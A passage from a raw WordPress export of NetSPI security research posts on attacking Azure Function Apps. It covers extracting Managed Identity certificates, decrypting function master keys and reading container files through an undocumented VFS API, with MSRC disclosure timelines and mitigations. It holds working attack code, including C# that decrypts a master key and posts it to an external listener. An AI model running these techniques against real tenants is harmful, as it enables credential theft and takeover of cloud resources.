        "ResourceId": "/subscriptions/[REDACTED]/Microsoft.ManagedIdentity/userAssignedIdentities/[REDACTED]", 
        "Certificate": "MIIK[REDACTED]0A==", 
        "PrincipalId": "[REDACTED]", 
        "AuthenticationEndpoint": null 
      } 
    ], 
[Truncated]

In each identity listed (SystemAssigned and UserAssigned), there was a “Certificate” section that contained Base64 encoded data, that looked like a private certificate (starts with “MII…”). Next, we decoded the Base64 data and wrote it to a file. Since we assumed that this was a PFX file, we used that as the file extension.  

$b64 = " MIIK[REDACTED]H0A==" 

[IO.File]::WriteAllBytes("C:\temp\micert.pfx", [Convert]::FromBase64String($b64))

We then opened the certificate file in Windows to see that it was a valid PFX file, that did not have an attached password, and we then imported it into our local certificate store. Investigating the certificate information in our certificate store, we noted that the “Issued to:” GUID matched the Managed Identity’s Service Principal ID (b1abdc5c-3e68-476a-9191-428c1300c50c). 

We then opened the certificate file in Windows to see that it was a valid PFX file, that did not have an attached password, and we then imported it into our local certificate store. Investigating the certificate information in our certificate store, we noted that the “Issued to:” GUID matched the Managed Identity’s Service Principal ID (b1abdc5c-3e68-476a-9191-428c1300c50c).

After installing the certificate, we were then able to use the certificate to authenticate to the Az PowerShell module as the Managed Identity.

PS C:\> Connect-AzAccount -ServicePrincipal -Tenant [REDACTED] -CertificateThumbprint BC5C431024BC7F52C8E9F43A7387D6021056630A -ApplicationId b1abdc5c-3e68-476a-9191-428c1300c50c

Account				             SubscriptionName    TenantId       Environment
-------      				     ----------------    ---------      -----------
b1abdc5c-3e68-476a-9191-428c1300c50c         Research 	         [REDACTED]	AzureCloud

For anyone who has worked with Managed Identities in Azure, you’ll immediately know that this fundamentally breaks the intended usage of a Managed Identity on an Azure resource. Managed Identity credentials are never supposed to be accessed by users in Azure, and the Service Principal App Registration (where you would validate the existence of these credentials) for the Managed Identity isn’t visible in the Azure Portal. The intent of Managed Identities is to grant temporary token-based access to the identity, only from the resource that has the identity attached.

While the Portal UI restricts visibility into the Service Principal App Registration, the details are available via the Get-AzADServicePrincipal Az PowerShell function. The exported certificate files have a 6-month (180 day) expiration date, but the actual credential storage mechanism in Azure AD (now Entra ID) has a 3-month (90 day) rolling rotation for the Managed Identity certificates. On the plus side, certificates are not deleted from the App Registration after the replacement certificate has been created. Based on our observations, it appears that you can make use of the full 3-month life of the certificate, with one month overlapping the new certificate that is issued.

It should be noted that while this proof of concept shows exploitation through Contributor level access to the Function App, any attacker that gained command execution on the Function App container would have been able to execute this attack and gain access to the attached Managed Identity credentials and Function App keys. There are a number of ways that an attacker could get command execution in the container, which we’ve highlighted a few options in the talk that originated this line of research.

Conclusion / MSRC Response

At this point in the research, we quickly put together a report and filed it with MSRC. Here’s what the process looked like:

  • 7/12/23 - Initial discovery of the issue and filing of the report with MSRC
  • 7/13/23 – MSRC opens Case 80917 to manage the issue
  • 8/02/23 – NetSPI requests update on status of the issue
  • 8/03/23 – Microsoft closes the case and issues the following response:
Hi Karl,
 
Thank you for your patience.
 
MSRC has investigated this issue and concluded that this does not pose an immediate threat that requires urgent attention. This is because, for an attacker or user who already has publish access, this issue did not provide any additional access than what is already available. However, the teams agree that access to relevant filesystems and other information needs to be limited.
 
The teams are working on the fix for this issue per their timelines and will take appropriate action as needed to help keep customers protected.
 
As such, this case is being closed.
 
Thank you, we absolutely appreciate your flagging this issue to us, and we look forward to more submissions from you in the future!
  • 8/03/23 – NetSPI replies, restating the issue and attempting to clarify MSRC’s understanding of the issue
  • 8/04/23 – MSRC Reopens the case, partly thanks to a thread of tweets
  • 9/11/23 - Follow up email with MSRC confirms the fix is in progress
  • 11/16/23 – NetSPI discloses the issue publicly

Microsoft’s solution for this issue was to encrypt the “MSISpecializationPayload” and rename it to “EncryptedTokenServiceSpecializationPayload”. It's unclear how this is getting encrypted, but we were able to confirm that the key that encrypts the credentials does not exist in the container that runs the user code.

It should be noted that the decryption technique for the “CONTAINER_START_CONTEXT_SAS_URI” still works to expose the Function App keys. So, if you do manage to get code execution in a Function App container, you can still potentially use this technique to persist on the Function App with this method.


Prior Research Note:
While doing our due diligence for this blog, we tried to find any prior research on this topic. It appears that Trend Micro also found this issue and disclosed it in June of 2022.

[post_title] => Mistaken Identity: Extracting Managed Identity Credentials from Azure Function Apps  [post_excerpt] => NetSPI explores extracting managed identity credentials from Azure Function Apps to expose sensitive data. [post_status] => publish [comment_status] => closed [ping_status] => closed [post_password] => [post_name] => mistaken-identity-azure-function-apps [to_ping] => [pinged] => [post_modified] => 2023-11-15 20:46:26 [post_modified_gmt] => 2023-11-16 02:46:26 [post_content_filtered] => [post_parent] => 0 [guid] => https://www.netspi.com/?p=31440 [menu_order] => 34 [post_type] => post [post_mime_type] => [comment_count] => 0 [filter] => raw ) [4] => WP_Post Object ( [ID] => 31226 [post_author] => 53 [post_date] => 2023-10-11 18:05:48 [post_date_gmt] => 2023-10-11 23:05:48 [post_content] =>
Watch Now

At Black Hat, NetSPI VP of Research Karl Fosaaen sat down with the host of the Cloud Security Podcast Ashish Rajan to discuss all things Azure penetration testing.

During the conversation, he addressed unique challenges associated with conducting penetration tests on web applications hosted within the Azure Cloud. He also provides valuable insights into the specialized skills required for effective penetration testing in Azure environments.

Contrary to common misconceptions, cloud penetration testing in Microsoft Azure is far more complex than a mere configuration review, a misconception that extends to other cloud providers like AWS and Google Cloud as well. In this video, Karl addresses several important questions and methodologies, clarifying the distinct nature of penetration testing within the Azure ecosystem.

[wonderplugin_video iframe="https://youtu.be/Y0BkXKthQ5c" lightbox=0 lightboxsize=1 lightboxwidth=1200 lightboxheight=674.999999999999916 autoopen=0 autoopendelay=0 autoclose=0 lightboxtitle="" lightboxgroup="" lightboxshownavigation=0 showimage="" lightboxoptions="" videowidth=1200 videoheight=674.999999999999916 keepaspectratio=1 autoplay=0 loop=0 videocss="position:relative;display:block;background-color:#000;overflow:hidden;max-width:100%;margin:0 auto;" playbutton="https://www.netspi.com/wp-content/plugins/wonderplugin-video-embed/engine/playvideo-64-64-0.png"]

[post_title] => Azure Cloud Security Pentesting Skills [post_excerpt] => [post_status] => publish [comment_status] => closed [ping_status] => closed [post_password] => [post_name] => azure-cloud-security-pentesting-skills [to_ping] => [pinged] => [post_modified] => 2023-10-11 18:05:51 [post_modified_gmt] => 2023-10-11 23:05:51 [post_content_filtered] => [post_parent] => 0 [guid] => https://www.netspi.com/?post_type=webinars&p=31226 [menu_order] => 12 [post_type] => webinars [post_mime_type] => [comment_count] => 0 [filter] => raw ) [5] => WP_Post Object ( [ID] => 31207 [post_author] => 10 [post_date] => 2023-10-10 13:30:47 [post_date_gmt] => 2023-10-10 18:30:47 [post_content] =>

Today, we are excited to introduce you to the transformed Dark Side Ops (DSO) training courses by NetSPI. With years of experience under our belt, we've taken our renowned DSO courses and reimagined them to offer a dynamic, self-directed approach. 

The Evolution of DSO

Traditionally, our DSO courses were conducted in-person, offering a blend of expert-led lectures and hands-on labs. However, the pandemic prompted us to adapt. We shifted to remote learning via Zoom, but we soon realized that we were missing the interactivity and personalized pace that made in-person training so impactful. 

A Fresh Approach

In response to this, we've reimagined DSO for the modern era. Presenting our self-directed, student-paced online courses that give you the reins to your learning journey. While preserving the exceptional content, we've infused a new approach that includes: 

  • Video Lectures: Engaging video presentations that bring the classroom to your screen, allowing you to learn at your convenience. 
  • Real-World Labs: Our DSO courses now enable you to create your own hands-on lab environment, bridging the gap between theory and practice. 
  • Extended Access: Say goodbye to rushed deadlines. You now have a 90-day window to complete the course at your own pace, ensuring a comfortable and comprehensive learning experience. 
  • Quality, Reimagined: We are unwavering in our commitment to upholding the highest training standards. Your DSO experience will continue to be exceptional. 
  • Save Big: For those eager to maximize their learning journey, register for all three courses and save $1,500. 

What is DSO?

DSO 1: Malware Dev Training

  • Dive deep into source code to gain a strong understanding of execution vectors, payload generation, automation, staging, command and control, and exfiltration. Intensive, hands-on labs provide even intermediate participants with a structured and challenging approach to write custom code and bypass the very latest in offensive countermeasures. 

DSO 2: Adversary Simulation Training

  • Do you want to be the best resource when the red team is out of options? Can you understand, research, build, and integrate advanced new techniques into existing toolkits? Challenge yourself to move beyond blog posts, how-tos, and simple payloads. Let’s start simulating real world threats with real world methodology. 

DSO Azure: Azure Cloud Pentesting Training 

  • Traditional penetration testing has focused on physical assets on internal and external networks. As more organizations begin to shift these assets up to cloud environments, penetration testing processes need to be updated to account for the complexities introduced by cloud infrastructure. 

Join us on this journey of continuous learning, where we're committed to supporting you every step of the way. Register for Dark Side Ops today.

Join our mailing list for more updates and remember, in the realm of cybersecurity, constant evolution is key. We are here to help you stay ahead in this ever-evolving landscape. 

[post_title] => NetSPI's Dark Side Ops Courses: Evolving Cybersecurity Excellence [post_excerpt] => Check out our evolved Dark Side Operations courses with a fully virtual model to evolve your cybersecurity skillset. [post_status] => publish [comment_status] => closed [ping_status] => closed [post_password] => [post_name] => dark-side-ops-courses-evolving-cybersecurity-excellence [to_ping] => [pinged] => [post_modified] => 2023-10-10 13:39:14 [post_modified_gmt] => 2023-10-10 18:39:14 [post_content_filtered] => [post_parent] => 0 [guid] => https://www.netspi.com/?p=31207 [menu_order] => 50 [post_type] => post [post_mime_type] => [comment_count] => 0 [filter] => raw ) [6] => WP_Post Object ( [ID] => 30784 [post_author] => 37 [post_date] => 2023-08-12 13:30:00 [post_date_gmt] => 2023-08-12 18:30:00 [post_content] =>

When deploying an Azure Function App, you’re typically prompted to select a Storage Account to use in support of the application. Access to these supporting Storage Accounts can lead to disclosure of Function App source code, command execution in the Function App, and (as we’ll show in this blog) decryption of the Function App Access Keys.

Azure Function Apps use Access Keys to secure access to HTTP Trigger functions. There are three types of access keys that can be used: function, system, and master (HTTP function endpoints can also be accessed anonymously). The most privileged access key available is the master key, which grants administrative access to the Function App including being able to read and write function source code.  

The master key should be protected and should not be used for regular activities. Gaining access to the master key could lead to supply chain attacks and control of any managed identities assigned to the Function. This blog explores how an attacker can decrypt these access keys if they gain access via the Function App’s corresponding Storage Account. 

TLDR; 

  • Function App Access Keys can be stored in Storage Account containers in an encrypted format 
  • Access Keys can be decrypted within the Function App container AND offline 
  • Works with Windows or Linux, with any runtime stack 
  • Decryption requires access to the decryption key (stored in an environment variable in the Function container) and the encrypted key material (from host.json). 

Previous Research 

Requirements 

Function Apps depend on Storage Accounts at multiple product tiers for code and secret storage. Extensive research has already been done for attacking Functions directly and via the corresponding Storage Accounts for Functions. This blog will focus specifically on key decryption for Function takeover. 

Required Permissions 

  • Permission to read Storage Account Container blobs, specifically the host.json file (located in Storage Account Containers named “azure-webjobs-secrets”) 
  • Permission to write to Azure File Shares hosting Function code
Screenshot of Storage Accounts associated with a Function App

The host.json file contains the encrypted access keys. The encrypted master key is contained in the masterKey.value field.

{ 
  "masterKey": { 
    "name": "master", 
    "value": "CfDJ8AAAAAAAAAAAAAAAAAAAAA[TRUNCATED]IA", 
    "encrypted": true 
  }, 
  "functionKeys": [ 
    { 
      "name": "default", 
      "value": "CfDJ8AAAAAAAAAAAAAAAAAAAAA[TRUNCATED]8Q", 
      "encrypted": true 
    } 
  ], 
  "systemKeys": [],
  "hostName": "thisisafakefunctionappprobably.azurewebsites.net",
  "instanceId": "dc[TRUNCATED]c3",
  "source": "runtime",
  "decryptionKeyId": "MACHINEKEY_DecryptionKey=op+[TRUNCATED]Z0=;"
}

The code for the corresponding Function App is stored in Azure File Shares. For what it's worth, with access to the host.json file, an attacker can technically overwrite existing keys and set the "encrypted" parameter to false, to inject their own cleartext function keys into the Function App (see Rogier Dijkman’s research). The directory structure for a Windows ASP.NET Function App (thisisnotrealprobably) typically uses the following structure: 

A new function can be created by adding a new set of folders under the wwwroot folder in the SMB file share. 

The ability to create a new function trigger by creating folders in the File Share is necessary to either decrypt the key in the function runtime OR return the decryption key by retrieving a specific environment variable. 

Decryption in the Function container 

Function App Key Decryption is dependent on ASP.NET Core Data Protection. There are multiple references to a specific library for Function Key security in the Function Host code.  

An old version of this library can be found at https://github.com/Azure/azure-websites-security. This library creates a Function specific Azure Data Protector for decryption. The code below has been modified from an old MSDN post to integrate the library directly into a .NET HTTP trigger. Providing the encrypted master key to the function decrypts the key upon triggering. 

The sample code below can be modified to decrypt the key and then send the key to a publicly available listener. 

#r "Newtonsoft.Json" 

using Microsoft.AspNetCore.DataProtection; 
using Microsoft.Azure.Web.DataProtection; 
using System.Net.Http; 
using System.Text; 
using System.Net; 
using Microsoft.AspNetCore.Mvc; 
using Microsoft.Extensions.Primitives; 
using Newtonsoft.Json; 

private static HttpClient httpClient = new HttpClient(); 

public static async Task<IActionResult> Run(HttpRequest req, ILogger log) 
{ 
    log.LogInformation("C# HTTP trigger function processed a request."); 

    DataProtectionKeyValueConverter converter = new DataProtectionKeyValueConverter(); 
    string keyname = "master"; 
    string encval = "Cf[TRUNCATED]NQ"; 
    var ikey = new Key(keyname, encval, true); 

    if (ikey.IsEncrypted) 
    { 
        ikey = converter.ReadValue(ikey); 
    } 
    // log.LogInformation(ikey.Value); 
    string url = "https://[TRUNCATED]"; 
    string body = $"{{"name":"{keyname}", "value":"{ikey.Value}"}}"; 
    var response = await httpClient.PostAsync(url, new StringContent(body.ToString())); 

    string name = req.Query["name"]; 

    string requestBody = await new StreamReader(req.Body).ReadToEndAsync(); 
    dynamic data = JsonConvert.DeserializeObject(requestBody); 
    name = name ?? data?.name; 

    string responseMessage = string.IsNullOrEmpty(name) 
        ? "This HTTP triggered function executed successfully. Pass a name in the query string or in the request body for a personalized response." 
                : $"Hello, {name}. This HTTP triggered function executed successfully."; 

            return new OkObjectResult(responseMessage); 
} 

class DataProtectionKeyValueConverter 
{ 
    private readonly IDataProtector _dataProtector; 
 
    public DataProtectionKeyValueConverter() 
    { 
        var provider = DataProtectionProvider.CreateAzureDataProtector(); 
        _dataProtector = provider.CreateProtector("function-secrets"); 
    } 

    public Key ReadValue(Key key) 
    { 
        var resultKey = new Key(key.Name, null, false); 
        resultKey.Value = _dataProtector.Unprotect(key.Value); 
        return resultKey; 
    } 
} 

class Key 
{ 
    public Key(){} 

    public Key(string name, string value, bool encrypted) 
    { 
        Name = name; 
        Value = value; 
        IsEncrypted = encrypted; 
    } 

    [JsonProperty(PropertyName = "name")] 
    public string Name { get; set; } 

    [JsonProperty(PropertyName = "value")] 
    public string Value { get; set; } 

    [JsonProperty(PropertyName = "encrypted")] 
    public bool IsEncrypted { get; set; }
}

Triggering via browser: 

Screenshot of triggering via browser saying This HTTP triggered function executed successfully. Pass a name in the query body for a personalized response.

Burp Collaborator:

Screenshot of Burp collaborator.

Master key:

Screenshot of Master key.

Local Decryption 

Decryption can also be done outside of the function container. The https://github.com/Azure/azure-websites-security repo contains an older version of the code that can be pulled down and run locally through Visual Studio. However, there is one requirement for running locally and that is access to the decryption key.

The code makes multiple references to the location of default keys:

The Constants.cs file leads to two environment variables of note: AzureWebEncryptionKey (default) or MACHINEKEY_DecryptionKey. The decryption code defaults to the AzureWebEncryptionKey environment variable.  

One thing to keep in mind is that the environment variable will be different depending on the underlying Function operating system. Linux based containers will use AzureWebEncryptionKey while Windows will use MACHINEKEY_DecryptionKey. One of those environment variables will be available via Function App Trigger Code, regardless of the runtime used. The environment variable values can be returned in the Function by using native code. Example below is for PowerShell in a Windows environment: 

$env:MACHINEKEY_DecryptionKey

This can then be returned to the user via an HTTP Trigger response or by having the Function send the value to another endpoint. 

The local decryption can be done once the encrypted key data and the decryption keys are obtained. After pulling down the GitHub repo and getting it setup in Visual Studio, quick decryption can be done directly through an existing test case in DataProtectionProviderTests.cs. The following edits can be made.

// Copyright (c) .NET Foundation. All rights reserved. 
// Licensed under the MIT License. See License.txt in the project root for license information. 

using System; 
using Microsoft.Azure.Web.DataProtection; 
using Microsoft.AspNetCore.DataProtection; 
using Xunit; 
using System.Diagnostics; 
using System.IO; 

namespace Microsoft.Azure.Web.DataProtection.Tests 
{ 
    public class DataProtectionProviderTests 
    { 
        [Fact] 
        public void EncryptedValue_CanBeDecrypted()  
        { 
            using (var variables = new TestScopedEnvironmentVariable(Constants.AzureWebsiteLocalEncryptionKey, "CE[TRUNCATED]1B")) 
            { 
                var provider = DataProtectionProvider.CreateAzureDataProtector(null, true); 

                var protector = provider.CreateProtector("function-secrets"); 

                string expected = "test string"; 

                // string encrypted = protector.Protect(expected); 
                string encrypted = "Cf[TRUNCATED]8w"; 

                string result = protector.Unprotect(encrypted); 

                File.WriteAllText("test.txt", result); 
                Assert.Equal(expected, result); 
            } 
        } 
    } 
} 

Run the test case after replacing the variable values with the two required items. The test will fail, but the decrypted master key will be returned in test.txt! This can then be used to query the Function App administrative REST APIs. 

Tool Overview 

NetSPI created a proof-of-concept tool to exploit Function Apps through the connected Storage Account. This tool requires write access to the corresponding File Share where the Function code is stored and supports .NET, PSCore, Python, and Node. Given a Storage Account that is connected to a Function App, the tool will attempt to create a HTTP Trigger (function-specific API key required for access) to return the decryption key and scoped Managed Identity access tokens (if applicable). The tool will also attempt to cleanup any uploaded code once the key and tokens are received.  

Once the encryption key and encrypted function app key are returned, you can use the Function App code included in the repo to decrypt the master key. To make it easier, we’ve provided an ARM template in the repo that will create the decryption Function App for you.

Screenshot of welcome screen to the NetSPI "FuncoPop" app (Function App Key Decryption).

See the GitHub link https://github.com/NetSPI/FuncoPop for more info. 

Prevention and Mitigation 

There are a number of ways to prevent the attack scenarios outlined in this blog and in previous research. The best prevention strategy is treating the corresponding Storage Accounts as an extension of the Function Apps. This includes: 

  1. Limiting the use of Storage Account Shared Access Keys and ensuring that they are not stored in cleartext.
  1. Rotating Shared Access Keys. 
  1. Limiting the creation of privileged, long lasting SAS tokens. 
  1. Use the principle of least privilege. Only grant the least privileges necessary to narrow scopes. Be aware of any roles that grant write access to Storage Accounts (including those roles with list key permissions!) 
  1. Identify Function Apps that use Storage Accounts and ensure that these resources are placed in dedicated Resource Groups.
  1. Avoid using shared Storage Accounts for multiple Functions. 
  1. Ensure that Diagnostic Settings are in place to collect audit and data plane logs. 

More direct methods of mitigation can also be taken such as storing keys in Key Vaults or restricting Storage Accounts to VNETs. See the links below for Microsoft recommendations. 

MSRC Timeline 

As part of our standard Azure research process, we ran our findings by MSRC before publishing anything. 

02/08/2023 - Initial report created
02/13/2023 - Case closed as expected and documented behavior
03/08/2023 - Second report created
04/25/2023 - MSRC confirms original assessment as expected and documented behavior 
08/12/2023 - DefCon Cloud Village presentation 

Thanks to Nick Landers for his help/research into ASP.NET Core Data Protection. 

[post_title] => What the Function: Decrypting Azure Function App Keys  [post_excerpt] => When deploying an Azure Function App, access to supporting Storage Accounts can lead to disclosure of source code, command execution in the app, and decryption of the app’s Access Keys. [post_status] => publish [comment_status] => closed [ping_status] => closed [post_password] => [post_name] => what-the-function-decrypting-azure-function-app-keys [to_ping] => [pinged] => [post_modified] => 2023-08-08 09:25:11 [post_modified_gmt] => 2023-08-08 14:25:11 [post_content_filtered] => [post_parent] => 0 [guid] => https://www.netspi.com/?p=30784 [menu_order] => 67 [post_type] => post [post_mime_type] => [comment_count] => 0 [filter] => raw ) [7] => WP_Post Object ( [ID] => 29749 [post_author] => 10 [post_date] => 2023-03-23 08:24:36 [post_date_gmt] => 2023-03-23 13:24:36 [post_content] =>

As penetration testers, we continue to see an increase in applications built natively in the cloud. These are a mix of legacy applications that are ported to cloud-native technologies and new applications that are freshly built in the cloud provider. One of the technologies that we see being used to support these development efforts is Azure Function Apps. We recently took a deeper look at some of the Function App functionality that resulted in a privilege escalation scenario for users with Reader role permissions on Function Apps. In the case of functions running in Linux containers, this resulted in command execution in the application containers. 

TL;DR 

Undocumented APIs used by the Azure Function Apps Portal menu allowed for arbitrary file reads on the Function App containers.  

  • For the Windows containers, this resulted in access to ASP. Net encryption keys. 
  • For the Linux containers, this resulted in access to function master keys that allowed for overwriting Function App code and gaining remote code execution in the container. 
https://www.youtube.com/watch?v=ClCeHiKIQqE

What are Azure Function Apps?

As noted above, Function Apps are one of the pieces of technology used for building cloud-native applications in Azure. The service falls under the umbrella of “App Services” and has many of the common features of the parent service. At its core, the Function App service is a lightweight API service that can be used for hosting serverless application services.  

The Azure Portal allows users (with Reader or greater permissions) to view files associated with the Function App, along with the code for the application endpoints (functions). In the Azure Portal, under App files, we can see the files available at the root of the Function App. These are usually requirement files and any supporting files you want to have available for all underlying functions. 

An example of a file available at the root of the Function App within the Azure Portal.

Under the individual functions (HttpTrigger1), we can enter the Code + Test menu to see the source code for the function. Much like the code in an Automation Account Runbook, the function code is available to anyone with Reader permissions. We do frequently find hardcoded credentials in this menu, so this is a common menu for us to work with. 

A screenshot of the source for the function (HttpTrigger1).

Both file viewing options rely on an undocumented API that can be found by proxying your browser traffic while accessing the Azure Portal. The following management.azure.com API endpoint uses the VFS function to list files in the Function App:

https://management.azure.com/subscriptions/$SUB_ID/resourceGroups/tes
ter/providers/Microsoft.Web/sites/vfspoc/hostruntime/admin/vfs//?rel
ativePath=1&api-version=2021-01-15 

In the example above, $SUB_ID would be your subscription ID, and this is for the “vfspoc” Function App in the “tester” resource group.

Identify and fix insecure Azure configurations. Explore NetSPI’s Azure Penetration Testing solutions.

Discovery of the Issue

Using the identified URL, we started enumerating available files in the output:

[
  {
    "name": "host.json",
    "size": 141,
    "mtime": "2022-08-02T19:49:04.6152186+00:00",
    "crtime": "2022-08-02T19:49:04.6092235+00:00",
    "mime": "application/json",
    "href": "https://vfspoc.azurewebsites.net/admin/vfs/host.
json?relativePath=1&api-version=2021-01-15",
    "path": "C:\\home\\site\\wwwroot\\host.json"
  },
  {
    "name": "HttpTrigger1",
    "size": 0,
    "mtime": "2022-08-02T19:51:52.0190425+00:00",
    "crtime": "2022-08-02T19:51:52.0190425+00:00",
    "mime": "inode/directory",
    "href": "https://vfspoc.azurewebsites.net/admin/vfs/Http
Trigger1%2F?relativePath=1&api-version=2021-01-15",
    "path": "C:\\home\\site\\wwwroot\\HttpTrigger1"
  }
]

As we can see above, this is the expected output. We can see the host.json file that is available in the Azure Portal, and the HttpTrigger1 function directory. At first glance, this may seem like nothing. While reviewing some function source code in client environments, we noticed that additional directories were being added to the Function App root directory to add libraries and supporting files for use in the functions. These files are not visible in the Portal if they’re in a directory (See “Secret Directory” below). The Portal menu doesn’t have folder handling built in, so these files seem to be invisible to anyone with the Reader role. 

Function app files menu not showing the secret directory in the file drop down.

By using the VFS APIs, we can view all the files in these application directories, including sensitive files that the Azure Function App Contributors might have assumed were hidden from Readers. While this is a minor information disclosure, we can take the issue further by modifying the “relativePath” parameter in the URL from a “1” to a “0”. 

Changing this parameter allows us to now see the direct file system of the container. In this first case, we’re looking at a Windows Function App container. As a test harness, we’ll use a little PowerShell to grab a “management.azure.com” token from our authenticated (as a Reader) Azure PowerShell module session, and feed that to the API for our requests to read the files from the vfspoc Function App. 

$mgmtToken = (Get-AzAccessToken -ResourceUrl 
"https://management.azure.com").Token 

(Invoke-WebRequest -Verbose:$false -Uri (-join ("https://management.
azure.com/subscriptions/$SUB_ID/resourceGroups/tester/providers/
Microsoft.Web/sites/vfspoc/hostruntime/admin/vfs//?relativePath=
0&api-version=2021-01-15")) -Headers @{Authorization="Bearer 
$mgmtToken"}).Content | ConvertFrom-Json 

name   : data 
size   : 0 
mtime  : 2022-09-12T20:20:48.2362984+00:00 
crtime : 2022-09-12T20:20:48.2362984+00:00 
mime   : inode/directory 
href   : https://vfspoc.azurewebsites.net/admin/vfs/data%2F?
relativePath=0&api-version=2021-01-15 
path   : D:\home\data 

name   : LogFiles 
size   : 0 
mtime  : 2022-09-12T20:20:02.5561162+00:00 
crtime : 2022-09-12T20:20:02.5561162+00:00 
mime   : inode/directory 
href   : https://vfspoc.azurewebsites.net/admin/vfs/LogFiles%2
F?relativePath=0&api-version=2021-01-15 
path   : D:\home\LogFiles 

name   : site 
size   : 0 
mtime  : 2022-09-12T20:20:02.5701081+00:00 
crtime : 2022-09-12T20:20:02.5701081+00:00 
mime   : inode/directory 
href   : https://vfspoc.azurewebsites.net/admin/vfs/site%2F?
relativePath=0&api-version=2021-01-15 
path   : D:\home\site 

name   : ASP.NET 
size   : 0 
mtime  : 2022-09-12T20:20:48.2362984+00:00 
crtime : 2022-09-12T20:20:48.2362984+00:00 
mime   : inode/directory 
href   : https://vfspoc.azurewebsites.net/admin/vfs/ASP.NET%2F
?relativePath=0&api-version=2021-01-15 
path   : D:\home\ASP.NET

Access to Encryption Keys on the Windows Container

With access to the container’s underlying file system, we’re now able to browse into the ASP.NET directory on the container. This directory contains the “DataProtection-Keys” subdirectory, which houses xml files with the encryption keys for the application. 

Here’s an example URL and file for those keys:

https://management.azure.com/subscriptions/$SUB_ID/resourceGroups/
tester/providers/Microsoft.Web/sites/vfspoc/hostruntime/admin/vfs/
/ASP.NET/DataProtection-Keys/key-ad12345a-e321-4a1a-d435-4a98ef4b3
fb5.xml?relativePath=0&api-version=2018-11-01 

<?xml version="1.0" encoding="utf-8"?> 
<key id="ad12345a-e321-4a1a-d435-4a98ef4b3fb5" version="1"> 
  <creationDate>2022-03-29T11:23:34.5455524Z</creationDate> 
  <activationDate>2022-03-29T11:23:34.2303392Z</activationDate> 
  <expirationDate>2022-06-27T11:23:34.2303392Z</expirationDate> 
  <descriptor deserializerType="Microsoft.AspNetCore.DataProtection.
AuthenticatedEncryption.ConfigurationModel.AuthenticatedEncryptor
DescriptorDeserializer, Microsoft.AspNetCore.DataProtection, 
Version=3.1.18.0, Culture=neutral 
, PublicKeyToken=ace99892819abce50"> 
    <descriptor> 
      <encryption algorithm="AES_256_CBC" /> 
      <validation algorithm="HMACSHA256" /> 
      <masterKey p4:requiresEncryption="true" xmlns:p4="
https://schemas.asp.net/2015/03/dataProtection"> 
        <!-- Warning: the key below is in an unencrypted form. --> 
        <value>a5[REDACTED]==</value> 
      </masterKey> 
    </descriptor> 
  </descriptor> 
</key> 

While we couldn’t use these keys during the initial discovery of this issue, there is potential for these keys to be abused for decrypting information from the Function App. Additionally, we have more pressing issues to look at in the Linux container.

Command Execution on the Linux Container

Since Function Apps can run in both Windows and Linux containers, we decided to spend a little time on the Linux side with these APIs. Using the same API URLs as before, we change them over to a Linux container function app (vfspoc2). As we see below, this same API (with “relativePath=0”) now exposes the Linux base operating system files for the container:

https://management.azure.com/subscriptions/$SUB_ID/resourceGroups/tester/providers/Microsoft.Web/sites/vfspoc2/hostruntime/admin/vfs//?relativePath=0&api-version=2021-01-15 

JSON output parsed into a PowerShell object: 
name   : lost+found 
size   : 0 
mtime  : 1970-01-01T00:00:00+00:00 
crtime : 1970-01-01T00:00:00+00:00 
mime   : inode/directory 
href   : https://vfspoc2.azurewebsites.net/admin/vfs/lost%2Bfound%2F?relativePath=0&api-version=2021-01-15 
path   : /lost+found 

[Truncated] 

name   : proc 
size   : 0 
mtime  : 2022-09-14T22:28:57.5032138+00:00 
crtime : 2022-09-14T22:28:57.5032138+00:00 
mime   : inode/directory 
href   : https://vfspoc2.azurewebsites.net/admin/vfs/proc%2F?relativePath=0&api-version=2021-01-15 
path   : /proc 

[Truncated] 

name   : tmp 
size   : 0 
mtime  : 2022-09-14T22:56:33.6638983+00:00 
crtime : 2022-09-14T22:56:33.6638983+00:00 
mime   : inode/directory 
href   : https://vfspoc2.azurewebsites.net/admin/vfs/tmp%2F?relativePath=0&api-version=2021-01-15 
path   : /tmp 

name   : usr 
size   : 0 
mtime  : 2022-09-02T21:47:36+00:00 
crtime : 1970-01-01T00:00:00+00:00 
mime   : inode/directory 
href   : https://vfspoc2.azurewebsites.net/admin/vfs/usr%2F?relativePath=0&api-version=2021-01-15 
path   : /usr 

name   : var 
size   : 0 
mtime  : 2022-09-03T21:23:43+00:00 
crtime : 2022-09-03T21:23:43+00:00 
mime   : inode/directory 
href   : https://vfspoc2.azurewebsites.net/admin/vfs/var%2F?relativePath=0&api-version=2021-01-15 
path   : /var 

Breaking out one of my favorite NetSPI blogs, Directory Traversal, File Inclusion, and The Proc File System, we know that we can potentially access environmental variables for different PIDs that are listed in the “proc” directory.  

Description of the function of the environ file in the proc file system.

If we request a listing of the proc directory, we can see that there are a handful of PIDs (denoted by the numbers) listed:

https://management.azure.com/subscriptions/$SUB_ID/resourceGroups/tester/providers/Microsoft.Web/sites/vfspoc2/hostruntime/admin/vfs//proc/?relativePath=0&api-version=2021-01-15 

JSON output parsed into a PowerShell object: 
name   : fs 
size   : 0 
mtime  : 2022-09-21T22:00:39.3885209+00:00 
crtime : 2022-09-21T22:00:39.3885209+00:00 
mime   : inode/directory 
href   : https://vfspoc2.azurewebsites.net/admin/vfs/proc/fs/?relativePath=0&api-version=2021-01-15 
path   : /proc/fs 

name   : bus 
size   : 0 
mtime  : 2022-09-21T22:00:39.3895209+00:00 
crtime : 2022-09-21T22:00:39.3895209+00:00 
mime   : inode/directory 
href   : https://vfspoc2.azurewebsites.net/admin/vfs/proc/bus/?relativePath=0&api-version=2021-01-15 
path   : /proc/bus 

[Truncated] 

name   : 1 
size   : 0 
mtime  : 2022-09-21T22:00:38.2025209+00:00 
crtime : 2022-09-21T22:00:38.2025209+00:00 
mime   : inode/directory 
href   : https://vfspoc2.azurewebsites.net/admin/vfs/proc/1/?relativePath=0&api-version=2021-01-15 
path   : /proc/1 

name   : 16 
size   : 0 
mtime  : 2022-09-21T22:00:38.2025209+00:00 
crtime : 2022-09-21T22:00:38.2025209+00:00 
mime   : inode/directory 
href   : https://vfspoc2.azurewebsites.net/admin/vfs/proc/16/?relativePath=0&api-version=2021-01-15 
path   : /proc/16 

[Truncated] 

name   : 59 
size   : 0 
mtime  : 2022-09-21T22:00:38.6785209+00:00 
crtime : 2022-09-21T22:00:38.6785209+00:00 
mime   : inode/directory 
href   : https://vfspoc2.azurewebsites.net/admin/vfs/proc/59/?relativePath=0&api-version=2021-01-15 
path   : /proc/59 

name   : 1113 
size   : 0 
